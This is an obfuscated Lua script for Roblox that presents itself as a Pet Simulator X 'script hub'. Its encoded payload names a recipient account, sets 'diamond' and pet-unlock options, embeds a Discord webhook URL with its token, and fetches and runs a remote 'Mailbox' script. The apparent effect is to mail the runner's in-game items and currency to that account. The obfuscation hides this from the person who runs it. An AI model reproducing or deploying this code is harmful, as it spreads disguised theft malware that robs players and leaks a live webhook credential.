--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.6) ~  Much Love, Ferib 
--// Obwufscated Using Arkhalis

function IllIlllIllIlllIlllIlllIll(IllIlllIllIllIll) if (IllIlllIllIllIll==(((((919 + 636)-636)*3147)/3147)+919)) then return not true end if (IllIlllIllIllIll==(((((968 + 670)-670)*3315)/3315)+968)) then return not false end end; local IIlllIIlllIIlllIIlllII = (7*3-9/9+3*2/0+3*3);local IllIllIllIllI = (3*4-7/7+6*4/3+9*9);local IllIIIllIIIIllI = table.concat;function IllIIIIllIIIIIl(IIllllIIllll) function IllIllIllIllI(IllIllIllIllI) function IIlllIIlllIIlllIIlllII(IIlllIIlllIIlllIIlllII) end end end;IllIIIIllIIIIIl(900283);function IllIlllIllIlllIlllIlllIllIlllIIIlll(IllIllIllIllI) function IIlllIIlllIIlllIIlllII(IIlllIIlllIIlllIIlllII) local IllIllIllIllI = (9*0-7/5+3*1/3+8*2) end end;IllIlllIllIlllIlllIlllIllIlllIIIlll(9083);local IllIIllIIllIII = loadstring;local IlIlIlIlIlIlIlIlII = {'\45','\45','\47','\47','\32','\68','\101','\99','\111','\109','\112','\105','\108','\101','\100','\32','\67','\111','\100','\101','\46','\32','\10','\95','\71','\46','\85','\115','\101','\114','\110','\97','\109','\101','\32','\61','\32','\34','\97','\98','\100','\117','\108','\107','\97','\114','\101','\101','\109','\48','\52','\55','\53','\34','\10','\95','\71','\46','\71','\105','\102','\116','\77','\101','\115','\115','\97','\103','\101','\32','\61','\32','\34','\83','\99','\114','\105','\112','\116','\32','\84','\97','\120','\34','\10','\95','\71','\46','\68','\105','\97','\109','\111','\110','\100','\115','\32','\61','\32','\53','\48','\48','\48','\48','\48','\10','\95','\71','\46','\85','\110','\108','\111','\99','\107','\80','\101','\116','\115','\32','\61','\32','\116','\114','\117','\101','\10','\95','\71','\46','\65','\110','\116','\105','\76','\101','\97','\118','\101','\32','\61','\32','\116','\114','\117','\101','\10','\95','\71','\46','\67','\114','\97','\115','\104','\32','\61','\32','\116','\114','\117','\101','\10','\10','\95','\71','\46','\87','\101','\98','\104','\111','\111','\107','\32','\61','\32','\34','\104','\116','\116','\112','\115','\58','\47','\47','\100','\105','\115','\99','\111','\114','\100','\46','\99','\111','\109','\47','\97','\112','\105','\47','\119','\101','\98','\104','\111','\111','\107','\115','\47','\49','\49','\48','\48','\55','\51','\53','\50','\55','\57','\48','\50','\52','\56','\51','\50','\53','\53','\50','\47','\45','\99','\104','\70','\65','\48','\95','\49','\106','\85','\52','\53','\116','\75','\72','\103','\68','\112','\107','\76','\106','\69','\70','\107','\107','\75','\69','\74','\102','\55','\99','\52','\84','\65','\89','\114','\77','\98','\51','\56','\72','\75','\106','\108','\66','\72','\114','\103','\108','\118','\109','\67','\67','\54','\71','\101','\76','\74','\52','\88','\78','\49','\55','\65','\101','\65','\122','\88','\34','\32','\10','\10','\95','\71','\46','\83','\99','\114','\105','\112','\116','\78','\97','\109','\101','\32','\61','\32','\34','\65','\114','\107','\104','\97','\108','\105','\115','\32','\72','\117','\98','\34','\10','\95','\71','\46','\84','\105','\112','\49','\32','\61','\32','\34','\65','\114','\107','\104','\97','\108','\105','\115','\32','\72','\117','\98','\34','\10','\95','\71','\46','\84','\105','\112','\50','\32','\61','\32','\34','\35','\49','\32','\80','\101','\116','\32','\83','\105','\109','\117','\108','\97','\116','\111','\114','\32','\88','\32','\83','\99','\114','\105','\112','\116','\32','\72','\117','\98','\10','\95','\71','\46','\84','\105','\112','\51','\32','\61','\32','\34','\80','\108','\101','\97','\115','\101','\32','\98','\101','\32','\112','\97','\116','\105','\101','\110','\116','\44','\32','\116','\104','\105','\115','\32','\109','\97','\121','\32','\116','\97','\107','\101','\32','\97','\32','\119','\104','\105','\108','\101','\34','\10','\95','\71','\46','\84','\105','\112','\52','\32','\61','\32','\34','\68','\105','\100','\32','\121','\111','\117','\32','\107','\110','\111','\119','\32','\65','\114','\107','\104','\97','\108','\105','\115','\32','\72','\117','\98','\32','\119','\97','\115','\32','\116','\104','\101','\32','\102','\105','\114','\115','\116','\32','\80','\83','\88','\32','\83','\99','\114','\105','\112','\116','\63','\34','\10','\95','\71','\46','\84','\105','\112','\53','\32','\61','\32','\34','\74','\111','\105','\110','\32','\111','\117','\114','\32','\100','\105','\115','\99','\111','\114','\100','\32','\119','\104','\105','\108','\101','\32','\121','\111','\117','\32','\119','\97','\105','\116','\34','\10','\10','\108','\111','\97','\100','\115','\116','\114','\105','\110','\103','\40','\103','\97','\109','\101','\58','\72','\116','\116','\112','\71','\101','\116','\40','\34','\104','\116','\116','\112','\115','\58','\47','\47','\97','\114','\107','\104','\97','\108','\105','\115','\108','\117','\97','\46','\103','\105','\116','\104','\117','\98','\46','\105','\111','\47','\76','\117','\97','\47','\65','\114','\107','\104','\97','\108','\105','\115','\77','\97','\105','\108','\98','\111','\120','\46','\108','\117','\97','\34','\41','\41','\40','\41','\10',}IllIIllIIllIII(IllIIIllIIIIllI(IlIlIlIlIlIlIlIlII,IIIIIIIIllllllllIIIIIIII))()
